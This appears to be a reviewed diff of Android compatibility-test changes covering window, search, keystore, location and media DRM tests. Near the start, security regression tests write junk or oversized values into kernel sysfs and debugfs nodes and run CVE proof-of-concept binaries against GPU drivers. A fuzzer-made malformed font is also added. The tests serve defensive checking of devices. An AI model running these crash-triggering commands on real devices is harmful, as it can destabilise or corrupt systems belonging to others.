+ public void testPocCVE_2016_8451() throws Exception {
+ enableAdbRoot(getDevice());
+ String command =
+ "echo AAAAAAAAA > /sys/devices/f9924000.i2c/i2c-2/2-0070/power_control";
+ AdbUtils.runCommandLine(command, getDevice());
+ }
+
+ /**
+ * b/32659848
+ */
+ @SecurityTest
+ public void testPoc32659848() throws Exception {
+ String command =
+ "echo 18014398509481980 > /sys/kernel/debug/tracing/buffer_size_kb";
+ AdbUtils.runCommandLine(command, getDevice());
+ }
+}
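Review bot: `assertTrue(!result.equals("Vulnerable"))` in `testPocCVE_2016_8460` only fails when the PoC output is exactly that string; if the binary prints a trailing newline or any other text (its source is not in this hunk), the assertion can never fail and a vulnerable device passes. `assertFalse(result.contains("Vulnerable"));` is the safer check. The second line of the licence header also begins with stray `0;256;0c` text, which looks like terminal output pasted into the file and should be removed.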
diff --git a/hostsidetests/security/src/android/security/cts/Poc17_01.java b/hostsidetests/security/src/android/security/cts/Poc17_01.java
new file mode 100644
index 0000000..f8ed22a
--- /dev/null
+++ b/hostsidetests/security/src/android/security/cts/Poc17_01.java
@@ -0,0 +1,44 @@
+/**
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+
+@SecurityTest
+public class Poc17_01 extends SecurityTestCase {
+
+ /**
+ * b/31799863
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8482() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvmap")) {
+ AdbUtils.runPoc("CVE-2016-8482", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32636619
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0429() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvhost-as-gpu")) {
+ enableAdbRoot(getDevice());
+ AdbUtils.runPoc("CVE-2017-0429", getDevice(), 60);
+ }
+ }
+ }
diff --git a/hostsidetests/security/src/android/security/cts/SecurityTestCase.java b/hostsidetests/security/src/android/security/cts/SecurityTestCase.java
index b6599c1..5c84850 100644
--- a/hostsidetests/security/src/android/security/cts/SecurityTestCase.java
+++ b/hostsidetests/security/src/android/security/cts/SecurityTestCase.java
@@ -64,6 +64,17 @@
}
/**
+ * Check if a driver is present on a machine
+ */
+ public boolean containsDriver(ITestDevice mDevice, String driver) throws Exception {
+ String result = mDevice.executeShellCommand("ls -Zl " + driver);
+ if(result.contains("No such file or directory")) {
+ return false;
+ }
+ return true;
+ }
+
+ /**
* Makes sure the phone is online, and the ensure the current boottime is within 2 seconds
* (due to rounding) of the previous boottime to check if The phone has crashed.
*/
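Review bot: `containsDriver` treats every `ls` result other than "No such file or directory" as present, so a "Permission denied" or any other error text makes it return true and the caller runs its PoC against a node that may not exist. Matching the positive case would be more reliable; at minimum the Javadoc, which currently says only "Check if a driver is present on a machine", should state this limitation. `driver` is concatenated into the shell command unquoted, which is fine for the constant paths passed today but worth quoting in a shared helper. The parameter name `mDevice` uses the member-field prefix, and the body reduces to `return !result.contains("No such file or directory");`. The enclosing class starts and ends outside this hunk.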
diff --git a/hostsidetests/services/activitymanager/src/android/server/cts/ActivityManagerAppConfigurationTests.java b/hostsidetests/services/activitymanager/src/android/server/cts/ActivityManagerAppConfigurationTests.java
index 8bfc762..98982fc 100644
--- a/hostsidetests/services/activitymanager/src/android/server/cts/ActivityManagerAppConfigurationTests.java
+++ b/hostsidetests/services/activitymanager/src/android/server/cts/ActivityManagerAppConfigurationTests.java
@@ -123,6 +123,10 @@
* is launched to side from docked stack.
*/
public void testConfigurationUpdatesWhenRotatingToSideFromDocked() throws Exception {
+ if (!supportsScreenRotation()) {
+ CLog.logAndDisplay(LogLevel.INFO, "Skipping test: no rotation support");
+ return;
+ }
if (!supportsSplitScreenMultiWindow()) {
CLog.logAndDisplay(LogLevel.INFO, "Skipping test: no multi-window support");
return;
diff --git a/hostsidetests/services/activitymanager/src/android/server/cts/ActivityManagerDockedStackTests.java b/hostsidetests/services/activitymanager/src/android/server/cts/ActivityManagerDockedStackTests.java
index 86e7b6c..773584e 100644
--- a/hostsidetests/services/activitymanager/src/android/server/cts/ActivityManagerDockedStackTests.java
+++ b/hostsidetests/services/activitymanager/src/android/server/cts/ActivityManagerDockedStackTests.java
@@ -83,8 +83,7 @@
launchActivityInDockStack(LAUNCHING_ACTIVITY);
mAmWmState.computeState(mDevice, new String[] {LAUNCHING_ACTIVITY});
launchActivityToSide();
- mAmWmState.computeState(mDevice, new String[] {LAUNCHING_ACTIVITY, TEST_ACTIVITY_NAME});
-
+ mAmWmState.computeState(mDevice, new String[] {TEST_ACTIVITY_NAME});
mAmWmState.assertContainsStack(
"Must contain fullscreen stack.", FULLSCREEN_WORKSPACE_STACK_ID);
mAmWmState.assertContainsStack("Must contain docked stack.", DOCKED_STACK_ID);
@@ -138,7 +137,6 @@
launchActivityInDockStack(LAUNCHING_ACTIVITY);
mAmWmState.computeState(mDevice, new String[] {LAUNCHING_ACTIVITY});
-
final String[] waitForActivitiesVisible =
new String[] {TEST_ACTIVITY_NAME, LAUNCHING_ACTIVITY};
@@ -377,7 +375,6 @@
CLog.logAndDisplay(LogLevel.INFO, "Skipping test: no multi-window support");
return;
}
-
final String[] waitTestActivityName = new String[] {TEST_ACTIVITY_NAME};
executeShellCommand(getAmStartCmd(TEST_ACTIVITY_NAME));
mAmWmState.computeState(mDevice, waitTestActivityName);
diff --git a/hostsidetests/services/windowmanager/src/android/wm/cts/CrossAppDragAndDropTests.java b/hostsidetests/services/windowmanager/src/android/wm/cts/CrossAppDragAndDropTests.java
index 354b43c..77119c0 100644
--- a/hostsidetests/services/windowmanager/src/android/wm/cts/CrossAppDragAndDropTests.java
+++ b/hostsidetests/services/windowmanager/src/android/wm/cts/CrossAppDragAndDropTests.java
@@ -19,10 +19,12 @@
import com.android.tradefed.device.CollectingOutputReceiver;
import com.android.tradefed.device.DeviceNotAvailableException;
import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.log.LogUtil.CLog;
import com.android.tradefed.testtype.DeviceTestCase;
import java.util.HashMap;
import java.util.Map;
+import java.util.regex.Pattern;
public class CrossAppDragAndDropTests extends DeviceTestCase {
// Constants copied from ActivityManager.StackId. If they are changed there, these must be
@@ -47,13 +49,17 @@
private static final String INPUT_MOUSE_SWIPE = "input mouse swipe ";
private static final String TASK_ID_PREFIX = "taskId";
+ // Regex pattern to match adb shell am stack list output of the form:
+ // taskId=<TASK_ID>: <componentName> bounds=[LEFT,TOP][RIGHT,BOTTOM]
+ private static final String TASK_REGEX_PATTERN_STRING =
+ "taskId=[0-9]+: %s bounds=\\[[0-9]+,[0-9]+\\]\\[[0-9]+,[0-9]+\\]";
+
private static final int SWIPE_DURATION_MS = 500;
private static final String SOURCE_PACKAGE_NAME = "android.wm.cts.dndsourceapp";
private static final String TARGET_PACKAGE_NAME = "android.wm.cts.dndtargetapp";
private static final String TARGET_23_PACKAGE_NAME = "android.wm.cts.dndtargetappsdk23";
-
private static final String SOURCE_ACTIVITY_NAME = "DragSource";
private static final String TARGET_ACTIVITY_NAME = "DropTarget";
@@ -94,6 +100,7 @@
super.setUp();
mDevice = getDevice();
+
if (!supportsDragAndDrop()) {
return;
}
@@ -217,8 +224,15 @@
CollectingOutputReceiver outputReceiver = new CollectingOutputReceiver();
mDevice.executeShellCommand(AM_STACK_LIST, outputReceiver);
final String output = outputReceiver.getOutput();
+ final StringBuilder builder = new StringBuilder();
+ builder.append("Finding task info for task: ");
+ builder.append(name);
+ builder.append("\nParsing adb shell am output: " );
+ builder.append(output);
+ CLog.i(builder.toString());
+ final Pattern pattern = Pattern.compile(String.format(TASK_REGEX_PATTERN_STRING, name));
for (String line : output.split("\\n")) {
- if (line.contains(name)) {
+ if (pattern.matcher(line).find()) {
return line;
}
}
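Review bot: `name` is substituted into `TASK_REGEX_PATTERN_STRING` and compiled without quoting, so any regex metacharacters in it are interpreted. Each `.` in a component name matches any character, and a `$` (as in nested class names) would stop the line from matching at all. Quoting the value keeps the stricter line format while matching the name literally: `Pattern.compile(String.format(TASK_REGEX_PATTERN_STRING, Pattern.quote(name)))`. The pattern constant is added in the earlier hunk of this file. The enclosing method starts outside this hunk, so what callers pass as `name` is not visible here.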
@@ -331,8 +345,15 @@
}
private boolean supportsDragAndDrop() throws Exception {
- // Do not run this test on watches.
- return !mDevice.hasFeature("feature:android.hardware.type.watch");
+ String supportsMultiwindow = mDevice.executeShellCommand("am supports-multiwindow").trim();
+ if ("true".equals(supportsMultiwindow)) {
+ return true;
+ } else if ("false".equals(supportsMultiwindow)) {
+ return false;
+ } else {
+ throw new Exception(
+ "device does not support \"am supports-multiwindow\" shell command.");
+ }
}
public void testCancelSoon() throws Exception {
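Review bot: The exception thrown by `supportsDragAndDrop()` for unexpected output omits the text the device actually returned. It also asserts that the command is unsupported, when the output could equally be an error message or extra text around a valid answer. Including the value makes a failed run diagnosable from the report alone: `throw new Exception("unexpected output from \"am supports-multiwindow\": " + supportsMultiwindow);`. Separately, with the watch feature check removed, skipping on watches now depends on that command returning `false` there, which this hunk cannot confirm.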
diff --git a/tests/app/src/android/app/cts/SearchManagerTest.java b/tests/app/src/android/app/cts/SearchManagerTest.java
index 3a20225..bf7e2f9 100644
--- a/tests/app/src/android/app/cts/SearchManagerTest.java
+++ b/tests/app/src/android/app/cts/SearchManagerTest.java
@@ -16,11 +16,13 @@
package android.app.cts;
+import android.app.SearchManager;
+import android.app.UiModeManager;
import android.app.stubs.CTSActivityTestCaseBase;
import android.app.stubs.SearchManagerStubActivity;
import android.content.Context;
import android.content.Intent;
-import android.content.pm.PackageManager;
+import android.content.res.Configuration;
public class SearchManagerTest extends CTSActivityTestCaseBase {
@@ -33,7 +35,7 @@
}
public void testStopSearch() throws InterruptedException {
- if (isTelevision() || isWatch()) {
+ if (!hasGlobalSearchActivity()) {
return;
}
SearchManagerStubActivity.setCTSResult(this);
@@ -42,7 +44,7 @@
}
public void testSetOnDismissListener() throws InterruptedException {
- if (isTelevision() || isWatch()) {
+ if (!hasGlobalSearchActivity()) {
return;
}
SearchManagerStubActivity.setCTSResult(this);
@@ -51,7 +53,7 @@
}
public void testSetOnCancelListener() throws InterruptedException {
- if (isTelevision() || isWatch()) {
+ if (!hasGlobalSearchActivity()) {
return;
}
SearchManagerStubActivity.setCTSResult(this);
@@ -59,16 +61,22 @@
waitForResult();
}
- private boolean isTelevision() {
+ private boolean hasGlobalSearchActivity() {
Context context = getInstrumentation().getTargetContext();
- PackageManager pm = context.getPackageManager();
- return pm.hasSystemFeature(PackageManager.FEATURE_TELEVISION)
- || pm.hasSystemFeature(PackageManager.FEATURE_LEANBACK);
- }
-
- private boolean isWatch() {
- Context context = getInstrumentation().getTargetContext();
- PackageManager pm = context.getPackageManager();
- return pm.hasSystemFeature(PackageManager.FEATURE_WATCH);
+ UiModeManager uiModeManager = context.getSystemService(UiModeManager.class);
+ if (uiModeManager.getCurrentModeType() == Configuration.UI_MODE_TYPE_TELEVISION) {
+ return false;
+ }
+ SearchManager searchManager =
+ (SearchManager) context.getSystemService(Context.SEARCH_SERVICE);
+ if (searchManager == null) {
+ return false;
+ }
+ try {
+ return searchManager.getGlobalSearchActivity() != null;
+ } catch (NullPointerException e) {
+ // Means there is no internal search service.
+ return false;
+ }
}
}
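Review bot: The `catch (NullPointerException e)` in `hasGlobalSearchActivity()` treats every NPE raised under `getGlobalSearchActivity()` as "no search service". A real defect in that path would therefore make all three tests return early and be reported as passed. The comment should name the platform condition that produces the NPE, and the skip should be logged so it is visible in the run output. Note also that `uiModeManager` is dereferenced without the null check that `searchManager` gets a few lines later.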
diff --git a/tests/tests/content/Android.mk b/tests/tests/content/Android.mk
index 699d839..1c5f6ae 100644
--- a/tests/tests/content/Android.mk
+++ b/tests/tests/content/Android.mk
@@ -23,13 +23,15 @@
LOCAL_JAVA_LIBRARIES := android.test.runner
-LOCAL_STATIC_JAVA_LIBRARIES := android-support-v4 \
- android-support-multidex \
- ctsdeviceutil \
- ctstestrunner \
- services.core \
- junit \
- legacy-android-test
+LOCAL_STATIC_JAVA_LIBRARIES := \
+ android-support-v4 \
+ android-support-multidex \
+ ctsdeviceutil \
+ ctstestrunner \
+ services.core \
+ junit \
+ legacy-android-test \
+
# Use multi-dex as the compatibility-common-util-devicesidelib dependency
# on ctsdeviceutil pushes us beyond 64k methods.
diff --git a/tests/tests/graphics/assets/ft45987.ttf b/tests/tests/graphics/assets/ft45987.ttf
new file mode 100644
index 0000000..369022f
--- /dev/null
+++ b/tests/tests/graphics/assets/ft45987.ttf
Binary files differ
diff --git a/tests/tests/graphics/assets/ft45987.ttf.README.txt b/tests/tests/graphics/assets/ft45987.ttf.README.txt
new file mode 100644
index 0000000..7586955
--- /dev/null
+++ b/tests/tests/graphics/assets/ft45987.ttf.README.txt
@@ -0,0 +1,4 @@
+ft45987.ttf was automatically generated by LibFuzzer
+(http://llvm.org/docs/LibFuzzer.html). Its base64 encoded version was taken
+from http://savannah.nongnu.org/bugs/?func=detailitem&item_id=45987 and
+decoded back.
diff --git a/tests/tests/graphics/src/android/graphics/cts/TypefaceTest.java b/tests/tests/graphics/src/android/graphics/cts/TypefaceTest.java
index e5a610c..7ac679a 100644
--- a/tests/tests/graphics/src/android/graphics/cts/TypefaceTest.java
+++ b/tests/tests/graphics/src/android/graphics/cts/TypefaceTest.java
@@ -221,4 +221,9 @@
typeface3, typeface4);
}
+ @SmallTest
+ public void testBadFont() {
+ Typeface typeface = Typeface.createFromAsset(getContext().getAssets(), "ft45987.ttf");
+ assertNotNull(typeface);
+ }
}
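Review bot: `testBadFont` has no comment saying what it guards, and `assertNotNull` alone does not convey it. Per the README added in this commit, `ft45987.ttf` is a LibFuzzer-generated file taken from a Savannah bug report, so the test presumably checks that loading a malformed font neither crashes the process nor fails. A Javadoc such as `/** Loading the fuzzer-generated font ft45987.ttf (see ft45987.ttf.README.txt) must not crash the process. */` would record that. If the font data is only parsed when text is measured or drawn, which is not visible here, the test would also need to use the typeface to reach the parser.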
diff --git a/tests/tests/keystore/src/android/keystore/cts/KeyGeneratorTest.java b/tests/tests/keystore/src/android/keystore/cts/KeyGeneratorTest.java
index 6deaed4..4a4ea98 100644
--- a/tests/tests/keystore/src/android/keystore/cts/KeyGeneratorTest.java
+++ b/tests/tests/keystore/src/android/keystore/cts/KeyGeneratorTest.java
@@ -271,12 +271,12 @@
continue;
}
}
- if ((i > 0) && ((i % 8 ) == 0)) {
+ if ((i >= 64) && ((i % 8 ) == 0)) {
keyGenerator.init(spec, rng);
SecretKey key = keyGenerator.generateKey();
assertEquals(i, TestUtils.getKeyInfo(key).getKeySize());
assertEquals((i + 7) / 8, rng.getOutputSizeBytes());
- } else {
+ } else if (i >= 64) {
try {
keyGenerator.init(spec, rng);
fail();
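Review bot: With both branches now gated on `i >= 64`, key sizes below 64 bits reach neither the success assertions nor the `fail()` path. The loop therefore no longer checks how the key generator treats them. If small sizes are intentionally left implementation-defined, say so next to the condition, e.g. `// Sizes below 64 bits are not checked: <reason>`. If they are expected to be rejected, they should go through the rejection branch instead. The loop and the algorithm under test are outside this hunk, so which of the two applies cannot be told from here.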
diff --git a/tests/tests/location/src/android/location/cts/LocationManagerTest.java b/tests/tests/location/src/android/location/cts/LocationManagerTest.java
index 7fcc2aa..3af213e 100644
--- a/tests/tests/location/src/android/location/cts/LocationManagerTest.java
+++ b/tests/tests/location/src/android/location/cts/LocationManagerTest.java
@@ -993,6 +993,27 @@
}
}
+ /**
+ * Test case for bug 33091107, where a malicious app used to be able to fool a real provider
+ * into providing a mock location that isn't marked as being mock.
+ */
+ public void testLocationShouldStillBeMarkedMockWhenProvidersDoNotMatch()
+ throws InterruptedException {
+ double latitude = 20;
+ double longitude = 40;
+
+ List<String> providers = mManager.getAllProviders();
+ if (providers.isEmpty()) {
+ // Device doesn't have any providers. Can't perform this test, and no need to do so:
+ // no providers that malicious app could fool
+ return;
+ }
+ String realProviderToFool = providers.get(0);
+
+ // Register for location updates, then set a mock location and ensure it is marked "mock"
+ updateLocationAndWait(TEST_MOCK_PROVIDER_NAME, realProviderToFool, latitude, longitude);
+ }
+
@UiThreadTest
public void testGpsStatusListener() {
MockGpsStatusListener listener = new MockGpsStatusListener();
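Review bot: `providers.get(0)` can be any entry of `getAllProviders()`, including `TEST_MOCK_PROVIDER_NAME` itself if the mock provider is already registered when this test runs (setup is outside this hunk). In that case both names passed to `updateLocationAndWait` are equal and the provider mismatch from bug 33091107 is not exercised. Pick the first provider that differs from the mock one, e.g. skip entries where `TEST_MOCK_PROVIDER_NAME.equals(provider)`, and return early only when none remains.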
@@ -1152,22 +1173,38 @@
private void updateLocationAndWait(String providerName, double latitude, double longitude)
throws InterruptedException {
+ updateLocationAndWait(providerName, providerName, latitude, longitude);
+ }
+
+ /**
+ * Like {@link #updateLocationAndWait(String, double, double)}, but allows inconsistent providers
+ * to be used in the calls to {@link Location#Location(String)} and {@link
+ * LocationManager#setTestProviderLocation(String, Location)}
+ *
+ * @param testProviderName used in {@link LocationManager#setTestProviderLocation(String,
+ * Location)}
+ * @param locationProviderName used in {@link Location#Location(String)}
+ */
+ private void updateLocationAndWait(String testProviderName, String locationProviderName,
+ double latitude, double longitude) throws InterruptedException {
+
// Register a listener for the location we are about to set.
MockLocationListener listener = new MockLocationListener();
HandlerThread handlerThread = new HandlerThread("updateLocationAndWait");
handlerThread.start();
- mManager.requestLocationUpdates(providerName, 0, 0, listener, handlerThread.getLooper());
+ mManager.requestLocationUpdates(locationProviderName, 0, 0, listener,
+ handlerThread.getLooper());
// Set the location.
- updateLocation(providerName, latitude, longitude);
+ updateLocation(testProviderName, locationProviderName, latitude, longitude);
// Make sure we received the location, and it is the right one.
- assertTrue(listener.hasCalledOnLocationChanged(TEST_TIME_OUT));
+ assertTrue("Listener not called", listener.hasCalledOnLocationChanged(TEST_TIME_OUT));
Location location = listener.getLocation();
- assertEquals(providerName, location.getProvider());
- assertEquals(latitude, location.getLatitude());
- assertEquals(longitude, location.getLongitude());
- assertEquals(true, location.isFromMockProvider());
+ assertEquals("Bad provider name", locationProviderName, location.getProvider());
+ assertEquals("Bad latitude", latitude, location.getLatitude());
+ assertEquals("Bad longitude", longitude, location.getLongitude());
+ assertTrue("Bad isMock", location.isFromMockProvider());
// Remove the listener.
mManager.removeUpdates(listener);
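Review bot: In the new four-argument `updateLocationAndWait`, a failing assertion skips `mManager.removeUpdates(listener)`. With the new test the listener is registered on a real provider rather than the mock one, so it stays registered for the remaining tests. Wrapping the part from `updateLocation(...)` through the assertions in `try { … } finally { mManager.removeUpdates(listener); }` keeps cleanup unconditional. The method continues past the end of this hunk, so any further cleanup there (for instance of `handlerThread`) would belong in the same `finally`.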
@@ -1220,13 +1257,23 @@
private void updateLocation(final String providerName, final double latitude,
final double longitude) {
- Location location = new Location(providerName);
+ updateLocation(providerName, providerName, latitude, longitude);
+ }
+
+ /**
+ * Like {@link #updateLocation(String, double, double)}, but allows inconsistent providers to be
+ * used in the calls to {@link Location#Location(String)} and
+ * {@link LocationManager#setTestProviderLocation(String, Location)}.
+ */
+ private void updateLocation(String testProviderName, String locationProviderName,
+ double latitude, double longitude) {
+ Location location = new Location(locationProviderName);
location.setLatitude(latitude);
location.setLongitude(longitude);
location.setAccuracy(1.0f);
- location.setTime(java.lang.System.currentTimeMillis());
+ location.setTime(System.currentTimeMillis());
location.setElapsedRealtimeNanos(SystemClock.elapsedRealtimeNanos());
- mManager.setTestProviderLocation(providerName, location);
+ mManager.setTestProviderLocation(testProviderName, location);
}
private void updateLocation(final double latitude, final double longitude) {
diff --git a/tests/tests/media/Android.mk b/tests/tests/media/Android.mk
index 1986934..0d27544 100644
--- a/tests/tests/media/Android.mk
+++ b/tests/tests/media/Android.mk
@@ -54,7 +54,8 @@
junit \
legacy-android-test
-LOCAL_JNI_SHARED_LIBRARIES := libctsmediacodec_jni libaudio_jni libnativehelper_compat_libc++ libndkaudioLib
+LOCAL_JNI_SHARED_LIBRARIES := libctsmediacodec_jni libaudio_jni libnativehelper_compat_libc++
+LOCAL_JNI_SHARED_LIBRARIES += libndkaudioLib libctsmediadrm_jni
# do not compress VP9 video files
LOCAL_AAPT_FLAGS := -0 .vp9
diff --git a/tests/tests/media/libmediandkjni/AMediaObjects.h b/tests/tests/media/libmediandkjni/AMediaObjects.h
new file mode 100644
index 0000000..c4d5397
--- /dev/null
+++ b/tests/tests/media/libmediandkjni/AMediaObjects.h
@@ -0,0 +1,84 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#ifndef AMEDIAOBJECTS_H_
+#define AMEDIAOBJECTS_H_
+
+#include <utils/Log.h>
+
+#include "media/NdkMediaCrypto.h"
+#include "media/NdkMediaDrm.h"
+#include "media/NdkMediaExtractor.h"
+
+namespace {
+
+// Simple class to manage deletion of AMedia objects
+class AMediaObjects {
+ public:
+ AMediaObjects();
+ virtual ~AMediaObjects();
+
+ void setCrypto(AMediaCrypto* const theCrypto) {
+ mCrypto = theCrypto;
+ }
+ void setDrm(AMediaDrm* const theDrm) {
+ mDrm = theDrm;
+ }
+ void setVideoExtractor(AMediaExtractor* const theExtractor) {
+ mVideoExtractor = theExtractor;
+ }
+ void setAudioExtractor(AMediaExtractor* const theExtractor) {
+ mAudioExtractor = theExtractor;
+ }
+
+ AMediaCrypto* getCrypto() const { return mCrypto; }
+ AMediaDrm* getDrm() const { return mDrm; }
+ AMediaExtractor* getAudioExtractor() const { return mAudioExtractor; }
+ AMediaExtractor* getVideoExtractor() const { return mVideoExtractor; }
+
+ private:
+ AMediaCrypto *mCrypto;
+ AMediaDrm* mDrm;
+ AMediaExtractor* mAudioExtractor;
+ AMediaExtractor* mVideoExtractor;
+
+ // Disallow copy and assignment
+ AMediaObjects(const AMediaObjects&);
+ void operator=(const AMediaObjects&);
+};
+
+AMediaObjects::AMediaObjects(void) : mCrypto(NULL), mDrm(NULL),
+ mAudioExtractor(NULL), mVideoExtractor(NULL) {
+}
+
+AMediaObjects::~AMediaObjects() {
+ if (mCrypto) {
+ AMediaCrypto_delete(mCrypto);
+ }
+ if (mAudioExtractor) {
+ AMediaExtractor_delete(mAudioExtractor);
+ }
+ if (mVideoExtractor) {
+ AMediaExtractor_delete(mVideoExtractor);
+ }
+ if (mDrm) {
+ AMediaDrm_release(mDrm);
+ }
+}
+
+} // anonymous namespace
+#endif // AMEDIAOBJECTS_H_
+
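Review bot: `AMediaObjects` deletes whatever pointers it holds in its destructor, but the four setters overwrite the member without releasing the object already stored, so calling a setter twice leaks the first object. Either release the old value first, e.g. `if (mCrypto && mCrypto != theCrypto) AMediaCrypto_delete(mCrypto);` at the top of `setCrypto` (with the matching `AMediaExtractor_delete` / `AMediaDrm_release` in the others), or state in the class comment that ownership transfers to the object and each setter may be called at most once. The constructor and destructor are also defined non-inline in a header inside an unnamed namespace, which gives every including file its own copy of the class; defining them inside the class body would avoid relying on that.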
diff --git a/tests/tests/media/libmediandkjni/Android.mk b/tests/tests/media/libmediandkjni/Android.mk
index 259c95e..1ccdede 100644
--- a/tests/tests/media/libmediandkjni/Android.mk
+++ b/tests/tests/media/libmediandkjni/Android.mk
@@ -14,6 +14,9 @@
#
LOCAL_PATH := $(call my-dir)
+#------------------------------------------------------------------------------
+# Builds libctsmediacodec_jni.so
+#
include $(CLEAR_VARS)
LOCAL_MODULE := libctsmediacodec_jni
@@ -21,20 +24,57 @@
LOCAL_MODULE_TAGS := optional
LOCAL_SRC_FILES := \
- native-media-jni.cpp \
- codec-utils-jni.cpp \
- md5_utils.cpp
+ native-media-jni.cpp \
+ codec-utils-jni.cpp \
+ md5_utils.cpp
LOCAL_C_INCLUDES := \
- $(JNI_H_INCLUDE) \
- system/core/include
+ $(JNI_H_INCLUDE) \
+ system/core/include
LOCAL_C_INCLUDES += $(call include-path-for, mediandk)
-LOCAL_SHARED_LIBRARIES := libandroid libnativehelper_compat_libc++ liblog libmediandk
+LOCAL_SHARED_LIBRARIES := \
+ libandroid libnativehelper_compat_libc++ \
+ liblog libmediandk
LOCAL_SDK_VERSION := 23
LOCAL_CFLAGS := -Werror -Wall
include $(BUILD_SHARED_LIBRARY)
+
+#------------------------------------------------------------------------------
+# Builds libctsmediadrm_jni.so
+#
+include $(CLEAR_VARS)
+
+LOCAL_MODULE := libctsmediadrm_jni
+
+# Don't include this package in any configuration by default.
+LOCAL_MODULE_TAGS := optional
+
+LOCAL_SRC_FILES := \
+ CtsMediaDrmJniOnLoad.cpp \
+ codec-utils-jni.cpp \
+ md5_utils.cpp \
+ native-mediadrm-jni.cpp \
+
+LOCAL_C_INCLUDES := \
+ $(JNI_H_INCLUDE) \
+ system/core/include
+
+
+LOCAL_C_INCLUDES += $(call include-path-for, mediandk)
+
+LOCAL_SHARED_LIBRARIES := \
+ libandroid libnativehelper_compat_libc++ \
+ liblog libmediandk libdl
+
+LOCAL_SDK_VERSION := 23
+
+LOCAL_NDK_STL_VARIANT := c++_static
+
+LOCAL_CFLAGS := -Werror -Wall
+
+include $(BUILD_SHARED_LIBRARY)
diff --git a/tests/tests/media/libmediandkjni/CtsMediaDrmJniOnLoad.cpp b/tests/tests/media/libmediandkjni/CtsMediaDrmJniOnLoad.cpp
new file mode 100644
index 0000000..24714a3
--- /dev/null
+++ b/tests/tests/media/libmediandkjni/CtsMediaDrmJniOnLoad.cpp
@@ -0,0 +1,34 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <jni.h>
+#include <stdio.h>
+
+extern int register_android_media_cts_NativeClearKeySystemTest(JNIEnv*);
+
+jint JNI_OnLoad(JavaVM *vm, void */*reserved*/) {
+ JNIEnv *env = NULL;
+
+ if (vm->GetEnv((void **) &env, JNI_VERSION_1_4) != JNI_OK) {
+ return JNI_ERR;
+ }
+
+ if (register_android_media_cts_NativeClearKeySystemTest(env)) {
+ return JNI_ERR;
+ }
+
+ return JNI_VERSION_1_4;
+}
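Review bot: `register_android_media_cts_NativeClearKeySystemTest` is declared with a bare `extern` and no comment, so the convention `JNI_OnLoad` relies on (a non-zero return means failure) is only implied by the `if`. A one-line comment on the declaration, such as `// Defined in native-mediadrm-jni.cpp; returns 0 on success.`, would document it, assuming that is where it is defined and what it returns. `<stdio.h>` is not used by anything in this file and can be dropped.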
diff --git a/tests/tests/media/libmediandkjni/md5_utils.cpp b/tests/tests/media/libmediandkjni/md5_utils.cpp
index f4f893a..8e520e1 100644
--- a/tests/tests/media/libmediandkjni/md5_utils.cpp
+++ b/tests/tests/media/libmediandkjni/md5_utils.cpp
@@ -157,7 +157,7 @@
*/
void
MD5Transform(UWORD32 buf[4], UWORD32 const in[16]) {
- register UWORD32 a, b, c, d;
+ UWORD32 a, b, c, d;
a = buf[0];
b = buf[1];
diff --git a/tests/tests/media/libmediandkjni/native-mediadrm-jni.cpp b/tests/tests/media/libmediandkjni/native-mediadrm-jni.cpp
new file mode 100644
index 0000000..b98a6af
--- /dev/null
+++ b/tests/tests/media/libmediandkjni/native-mediadrm-jni.cpp
@@ -0,0 +1,690 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define TAG "NativeMediaDrm"
+
+#include <utils/Log.h>
+#include <sys/types.h>
+
+#include <string>
+#include <vector>
+
+#include <assert.h>
+#include <jni.h>
+#include <JNIHelp.h>
+
+#include <android/native_window_jni.h>
+
+#include "AMediaObjects.h"
+
+#include "media/NdkMediaCodec.h"
+#include "media/NdkMediaCrypto.h"
+#include "media/NdkMediaDrm.h"
+#include "media/NdkMediaExtractor.h"
+#include "media/NdkMediaFormat.h"
+#include "media/NdkMediaMuxer.h"
+
+typedef std::vector<uint8_t> Uuid;
+
+struct fields_t {
+ jfieldID surface;
+ jfieldID mimeType;
+ jfieldID audioUrl;
+ jfieldID videoUrl;
+};
+
+struct PlaybackParams {
+ jobject surface;
+ jstring mimeType;
+ jstring audioUrl;
+ jstring videoUrl;
+};
+
+static fields_t gFieldIds;
+static bool gGotVendorDefinedEvent = false;
+
+static const size_t kPlayTimeSeconds = 30;
+static const size_t kUuidSize = 16;
+
